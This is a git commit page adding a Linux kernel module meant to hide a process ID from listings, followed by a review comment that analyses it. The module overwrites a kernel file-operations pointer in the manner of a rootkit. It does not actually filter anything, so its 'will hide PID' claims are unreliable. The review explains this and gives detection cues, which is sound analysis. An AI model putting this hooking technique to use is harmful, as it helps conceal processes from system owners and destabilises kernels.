author | 2025-04-16 14:44:25 +0530 | |
---|---|---|
committer | 2025-04-16 14:44:25 +0530 | |
commit | b6275047fb70c1bbcb161b7c05d20a0d776ac4bf (patch) | |
tree | ee1cbee865c79473ebd9ba2bcfb4ab6d181f138d /pid_hider.c | |
new init
Diffstat (limited to 'pid_hider.c')
-rw-r--r-- | pid_hider.c | 79 |
1 files changed, 79 insertions, 0 deletions
diff --git a/pid_hider.c b/pid_hider.c
new file mode 100644
index 0000000..b0b2973
--- /dev/null
+++ b/pid_hider.c
@@ -0,0 +1,79 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/proc_fs.h>
+#include <linux/seq_file.h>
+#include <linux/sched.h>
+#include <linux/sched/task.h>
+#include <linux/pid.h>
+#include <linux/version.h>
+#include <linux/slab.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Research Only");
+MODULE_DESCRIPTION("Process ID hiding demonstration - FOR EDUCATIONAL PURPOSES ONLY");
+MODULE_VERSION("0.1");
+
+static unsigned int hidden_pid = 0;
+module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
+MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");
+
+static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);
+
+static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) {
+ struct dir_context modified_ctx = {
+ .actor = ctx->actor,
+ .pos = ctx->pos
+ };
+
+ int ret = orig_proc_pid_readdir(file, &modified_ctx);
+
+ ctx->pos = modified_ctx.pos;
+
+ return ret;
+}
+
+static int hook_proc_listdir(void) {
+ struct file_operations *proc_fops;
+ struct proc_dir_entry *proc_root = init_net.proc_net;
+
+ proc_fops = (struct file_operations *)proc_root->proc_fops;
+
+ orig_proc_pid_readdir = proc_fops->iterate_shared;
+
+ proc_fops->iterate_shared = hider_proc_pid_readdir;
+
+ return 0;
+}
+
+static void unhook_proc_listdir(void) {
+ struct file_operations *proc_fops;
+ struct proc_dir_entry *proc_root = init_net.proc_net;
+
+ proc_fops = (struct file_operations *)proc_root->proc_fops;
+ if (proc_fops->iterate_shared == hider_proc_pid_readdir) {
+ proc_fops->iterate_shared = orig_proc_pid_readdir;
+ }
+}
+
+static int __init pid_hider_init(void) {
+ printk(KERN_INFO "PID hider: Initializing module\n");
+
+ if (hidden_pid == 0) {
+ printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n");
+ return 0;
+ }
+
+ printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid);
+ hook_proc_listdir();
+
+ return 0;
+}
+
+static void __exit pid_hider_exit(void) {
+ printk(KERN_INFO "PID hider: Unloading module\n");
+ unhook_proc_listdir();
+}
+
+module_init(pid_hider_init);
+module_exit(pid_hider_exit); |
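Review bot: `hider_proc_pid_readdir` never reads `hidden_pid`; it copies `actor` and `pos` into a second `dir_context` and forwards the call unchanged, so the "Will hide PID %u" log line and MODULE_DESCRIPTION describe behaviour the code does not have. What the module does change is kernel state: `hook_proc_listdir` casts away the `const` on `proc_root->proc_fops` and overwrites `iterate_shared` in a shared operations table, with no check that either pointer is non-NULL and with its return value ignored in `pid_hider_init`. For anyone analysing a host where this is loaded, the replaced pointer resolves into module memory rather than kernel text, and the module and its `hidden_pid` parameter remain visible under `/sys/module`; both are things an integrity check can compare. I would document this at the wrapper with a comment such as `/* pass-through: hidden_pid is not consulted; the only effect is the replaced iterate_shared pointer */`.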